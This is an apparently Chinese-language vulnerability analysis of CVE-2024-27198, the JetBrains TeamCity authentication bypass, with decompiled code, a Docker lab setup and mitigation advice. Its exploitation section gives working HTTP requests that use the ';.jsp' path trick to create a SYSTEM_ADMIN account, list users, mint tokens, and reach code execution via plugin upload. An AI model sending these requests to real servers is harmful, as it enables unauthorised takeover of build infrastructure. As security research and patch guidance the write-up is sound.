JetBrains TeamCity 身份验证绕过漏洞 (CVE-2024-27198) 深度分析与利用指南<\/h1>

漏洞概述<\/h2>
CVE-2024-27198 是 JetBrains TeamCity 中的一个高危身份验证绕过漏洞，影响 2023.11.4 之前的所有版本。该漏洞允许未经身份验证的远程攻击者绕过系统身份验证机制，创建管理员账户，从而完全控制 TeamCity 服务器及其所有项目、构建、代理和构件。<\/p>

受影响版本<\/h2>
TeamCity 2023.11.3 及更早版本<\/li> <\/ul>
漏洞原理<\/h2>

核心漏洞点<\/h3>
漏洞位于 jetbrains.buildServer.controllers.BaseController<\/code> 类的 handleRequestInternal<\/code> 方法中，具体涉及以下关键处理流程：<\/p>


请求处理流程<\/strong>：<\/p>

请求首先通过 doHandle<\/code> 方法处理<\/li>
如果返回的 ModelAndView<\/code> 不为空且不是重定向视图，则调用 updateViewIfRequestHasJspParameter<\/code> 方法<\/li>
<\/ul>
<\/li>

视图更新逻辑<\/strong>：<\/p>
private<\/span> void<\/span> updateViewIfRequestHasJspParameter<\/span>(<\/span>@NotNull<\/span> HttpServletRequest request,<\/span> @NotNull<\/span> ModelAndView modelAndView)<\/span> {<\/span>
<\/span><\/span>    boolean<\/span> isControllerRequestWithViewName =<\/span> modelAndView.<\/span>getViewName<\/span>()<\/span> !=<\/span> null<\/span> &&<\/span> !<\/span>request.<\/span>getServletPath<\/span>().<\/span>endsWith<\/span>(<\/span>".jsp"<\/span>);<\/span>
<\/span><\/span>    String jspFromRequest =<\/span> this<\/span>.<\/span>getJspFromRequest<\/span>(<\/span>request);<\/span>
<\/span><\/span>    if<\/span> (<\/span>isControllerRequestWithViewName &&<\/span> StringUtil.<\/span>isNotEmpty<\/span>(<\/span>jspFromRequest)<\/span> &&<\/span> !<\/span>modelAndView.<\/span>getViewName<\/span>().<\/span>equals<\/span>(<\/span>jspFromRequest))<\/span> {<\/span>
<\/span><\/span>        modelAndView.<\/span>setViewName<\/span>(<\/span>jspFromRequest);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>

JSP 参数过滤<\/strong>：<\/p>
protected<\/span> String getJspFromRequest<\/span>(<\/span>@NotNull<\/span> HttpServletRequest request)<\/span> {<\/span>
<\/span><\/span>    String jspFromRequest =<\/span> request.<\/span>getParameter<\/span>(<\/span>"jsp"<\/span>);<\/span>
<\/span><\/span>    return<\/span> jspFromRequest ==<\/span> null<\/span> ||<\/span> jspFromRequest.<\/span>endsWith<\/span>(<\/span>".jsp"<\/span>)<\/span> &&<\/span> !<\/span>jspFromRequest.<\/span>contains<\/span>(<\/span>"admin"<\/span>)<\/span> ?<\/span> jspFromRequest :<\/span> null<\/span>;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
绕过机制<\/h3>
攻击者可以通过在 jsp<\/code> 参数后附加 ;.jsp<\/code> 来绕过过滤：<\/p>

原始请求：\/login.html?jsp=\/app\/rest\/server;.jsp<\/code><\/li>
Tomcat 的 stripPathParams<\/code> 方法会去除 ;<\/code> 及其后的部分，最终路径变为 \/app\/rest\/server<\/code><\/li>
系统错误地将视图名称设置为 \/app\/rest\/server<\/code>，从而绕过身份验证检查<\/li>
<\/ol>
环境搭建<\/h2>
Docker 环境<\/h3>
# 拉取漏洞版本镜像<\/span>
<\/span><\/span>sudo docker pull jetbrains\/teamcity-server:2023.11.3
<\/span><\/span>
<\/span><\/span># 运行容器<\/span>
<\/span><\/span>sudo docker run -it -d --name teamcity -u root -p 8111:8111 jetbrains\/teamcity-server:2023.11.3
<\/span><\/span><\/code><\/pre>Docker Compose 方式<\/h3>
version<\/span>: '3.8'<\/span>
<\/span><\/span>services<\/span>:
<\/span><\/span>  teamcity<\/span>:
<\/span><\/span>    image<\/span>: jetbrains\/teamcity-server:2023.11.3<\/span>
<\/span><\/span>    container_name<\/span>: teamcity<\/span>
<\/span><\/span>    ports<\/span>:
<\/span><\/span>      - "8111:8111"<\/span>
<\/span><\/span>      - "5005:5005"<\/span>  # 调试端口<\/span>
<\/span><\/span>    user<\/span>: root<\/span>
<\/span><\/span><\/code><\/pre>调试环境配置<\/h3>


提取容器中的 TeamCity 文件：<\/p>
docker cp b0:\/opt\/teamcity .\/
<\/span><\/span><\/code><\/pre><\/li>

修改 catalina.sh<\/code> 添加调试参数：<\/p>
CATALINA_OPTS=<\/span>"-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005"<\/span>
<\/span><\/span><\/code><\/pre><\/li>

将修改后的文件复制回容器并重启：<\/p>
docker cp .\/teamcity\/bin\/catalina.sh b0:\/opt\/teamcity\/bin
<\/span><\/span>docker restart b0
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
漏洞利用<\/h2>
基本利用步骤<\/h3>


验证漏洞存在<\/strong>：<\/p>
GET \/login.html?jsp=\/app\/rest\/server;.jsp
<\/code><\/pre>
<\/li>

创建管理员用户<\/strong>：<\/p>
POST<\/span> \/xxx?jsp=\/app\/rest\/users;.jsp HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> target.com<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json<\/span>
<\/span><\/span>
<\/span><\/span>{
<\/span><\/span>    "username"<\/span>: "attacker"<\/span>,
<\/span><\/span>    "password"<\/span>: "P@ssw0rd"<\/span>,
<\/span><\/span>    "email"<\/span>: "attacker@example.com"<\/span>,
<\/span><\/span>    "roles"<\/span>: {
<\/span><\/span>        "role"<\/span>: [{
<\/span><\/span>            "roleId"<\/span>: "SYSTEM_ADMIN"<\/span>,
<\/span><\/span>            "scope"<\/span>: "g"<\/span>
<\/span><\/span>        }]
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

获取用户列表<\/strong>：<\/p>
GET<\/span> \/xxx?jsp=\/app\/rest\/users;.jsp HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> target.com<\/span>
<\/span><\/span><\/code><\/pre><\/li>

获取用户Token<\/strong>：<\/p>
GET<\/span> \/xxx?jsp=\/app\/rest\/users\/id:1\/tokens\/HaxorToken;.jsp HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> target.com<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
远程代码执行 (RCE)<\/h3>

使用上述方法创建管理员账户<\/li>
登录系统<\/li>
通过 TeamCity 的插件功能上传恶意插件实现 RCE<\/li>
<\/ol>
修复建议<\/h2>

立即升级到 TeamCity 2023.11.4 或更高版本<\/li>
如果无法立即升级，实施以下缓解措施：

限制对 TeamCity 服务器的网络访问<\/li>
启用严格的 IP 白名单<\/li>
监控可疑的管理员账户创建活动<\/li>
<\/ul>
<\/li>
<\/ol>
技术细节补充<\/h2>
漏洞触发条件<\/h3>

请求必须能够到达 BaseController.handleRequestInternal<\/code> 方法<\/li>
ModelAndView<\/code> 必须不为空且不是重定向视图<\/li>
jsp<\/code> 参数必须满足：

以 .jsp<\/code> 结尾<\/li>
不包含 admin<\/code> 字符串<\/li>
与当前视图名称不同<\/li>
<\/ul>
<\/li>
<\/ol>
路径处理机制<\/h3>
Tomcat 的 stripPathParams<\/code> 方法处理流程：<\/p>

查找 URI 中的第一个 ;<\/code> 字符<\/li>
如果找到，则截取 ;<\/code> 之前的部分作为最终路径<\/li>
这使得 ;.jsp<\/code> 后缀被去除，绕过 .jsp<\/code> 检查<\/li>
<\/ol>
参考链接<\/h2>

官方修复公告：JetBrains TeamCity 2023.11.4 Release Notes<\/a><\/li>
漏洞 PoC：W01fh4cker\/CVE-2024-27198-RCE<\/a><\/li>
<\/ul>

本教学文档详细描述了 CVE-2024-27198 的技术细节、环境搭建、漏洞分析和利用方法。请仅将此信息用于合法的安全研究和防御目的。<\/p>